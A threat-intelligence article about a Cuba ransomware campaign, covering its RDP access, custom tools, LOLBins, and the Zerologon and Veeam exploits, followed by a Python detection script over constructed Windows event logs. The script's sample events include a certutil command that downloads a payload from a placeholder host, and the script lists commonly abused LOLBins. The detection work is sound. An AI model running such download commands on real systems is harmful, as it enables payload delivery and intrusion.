
Cuba Ransomware Expands Horizons: New Industries, New Tools

Security researchers at BlackBerry analyzed an operation carried out by the Cuba ransomware group in June. The operation reached its peak when the group targeted a U.S. critical infrastructure entity, alongside launching attacks on an IT integrator in Latin America.

Diving into details

The Cuba ransomware group, suspected to have ties to Russia, employed a series of malicious tools that share similarities with its previous operations.
  • The attackers relied on reused credentials: the first sign of compromise was a successful administrator login over RDP.
  • Cuba's toolkit comprises an array of custom and off-the-shelf components. Among these tools are BUGHATCH (a custom downloader), BURNTCIGAR (a tool that disables anti-malware processes), and the Metasploit and Cobalt Strike frameworks.
  • The toolkit also incorporates numerous Living-off-the-Land Binaries (LOLBins), which can be used for malware delivery, file operations (such as downloading and uploading), or stealing passwords.

Use of exploits

The campaign deployed two exploits. The first targets Microsoft's Netlogon Remote Protocol (MS-NRPC), CVE-2020-1472 (Zerologon), which enables privilege escalation against Active Directory domain controllers: an attacker establishes a vulnerable Netlogon connection to a domain controller and can then obtain administrative access to the domain. The second is a novel tool targeting CVE-2023-27532 in Veeam Backup & Replication, which potentially grants attackers access to the encrypted credentials stored in the product's configuration database on the victim's system.
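The activity described above (an administrator RDP logon from outside the network, LOLBin execution on the same host shortly afterwards, and the Zerologon post-exploitation artefact on a domain controller) leaves distinct traces in Windows Security logs. The following is an added example of detection logic run over constructed sample events; it is not BlackBerry's or Cyware's tooling. The event records, host names, account names, the internal address ranges and the one-hour correlation window are all assumptions made for the example. The Zerologon check looks for Event ID 4742 (computer account changed) where the subject is ANONYMOUS LOGON and the target is the domain controller's own machine account, the documented artefact of the machine-account password reset used by CVE-2020-1472.

```python
"""Detection logic over constructed Windows Security events.
Added example, not code from the original article or from the vendors it
cites. Field names mirror Security log fields; the records are constructed."""
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Constructed sample events (not real telemetry).
EVENTS = [
    {"ts": "2023-06-01T02:10:05", "id": 4624, "host": "FILESRV01",
     "user": "Administrator", "logon_type": 10, "src_ip": "203.0.113.45"},
    {"ts": "2023-06-01T02:14:30", "id": 4688, "host": "FILESRV01",
     "user": "Administrator",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.45/a.dat C:\\Users\\Public\\a.dat"},
    {"ts": "2023-06-01T02:20:12", "id": 4742, "host": "DC01",
     "subject": "ANONYMOUS LOGON", "target": "DC01$"},
    {"ts": "2023-06-01T09:00:00", "id": 4624, "host": "FILESRV01",
     "user": "jsmith", "logon_type": 10, "src_ip": "10.0.5.17"},
    {"ts": "2023-06-01T09:05:00", "id": 4742, "host": "DC01",
     "subject": "SYSTEM", "target": "WS0042$"},
]

# Assumed environment facts: the org's internal ranges, privileged accounts,
# the set of domain controllers, and a short list of commonly abused LOLBins.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]
ADMIN_ACCOUNTS = {"administrator"}
DOMAIN_CONTROLLERS = {"DC01"}
LOLBINS = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe"}


def parse_ts(s):
    return datetime.fromisoformat(s)


def is_internal(ip):
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def external_admin_rdp(events):
    """4624 with LogonType 10 (RemoteInteractive, i.e. RDP) by a privileged
    account from an address outside the internal ranges."""
    return [e for e in events
            if e["id"] == 4624 and e.get("logon_type") == 10
            and e["user"].lower() in ADMIN_ACCOUNTS
            and not is_internal(e["src_ip"])]


def lolbin_after_rdp(events, window=timedelta(hours=1)):
    """4688 process creation of a known LOLBin on a host that had a flagged
    RDP logon within `window` beforehand."""
    rdp = external_admin_rdp(events)
    hits = []
    for e in events:
        if e["id"] != 4688:
            continue
        image = e["cmdline"].split()[0].rsplit("\\", 1)[-1].lower()
        if image not in LOLBINS:
            continue
        for r in rdp:
            delta = parse_ts(e["ts"]) - parse_ts(r["ts"])
            if r["host"] == e["host"] and timedelta(0) <= delta <= window:
                hits.append(e)
                break
    return hits


def zerologon_artifact(events):
    """4742 on a domain controller where the subject is ANONYMOUS LOGON and the
    target is the DC's own machine account: the trace left when CVE-2020-1472
    is used to reset the DC machine-account password."""
    return [e for e in events
            if e["id"] == 4742 and e["host"] in DOMAIN_CONTROLLERS
            and e["subject"].upper() == "ANONYMOUS LOGON"
            and e["target"].rstrip("$") in DOMAIN_CONTROLLERS]


if __name__ == "__main__":
    for name, fn in [("external admin RDP", external_admin_rdp),
                     ("LOLBin after RDP", lolbin_after_rdp),
                     ("Zerologon artefact", zerologon_artifact)]:
        for hit in fn(EVENTS):
            print(f"[{name}] {hit['ts']} {hit['host']} {hit}")
```

The three functions are deliberately independent so each can be mapped onto its own SIEM rule; the correlation in `lolbin_after_rdp` is the piece most worth tuning, since LOLBin use by administrators is routine and only becomes interesting in the context of a suspicious logon.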

The bottom line

Cuba ransomware has remained an active threat since it first appeared in 2019. The addition of CVE-2023-27532 to the list of vulnerabilities targeted by Cuba underscores the need to install security updates for Veeam Backup & Replication promptly. The case is a reminder of the substantial risk of postponing updates, especially when proof-of-concept exploits are publicly available.
Publisher: Cyware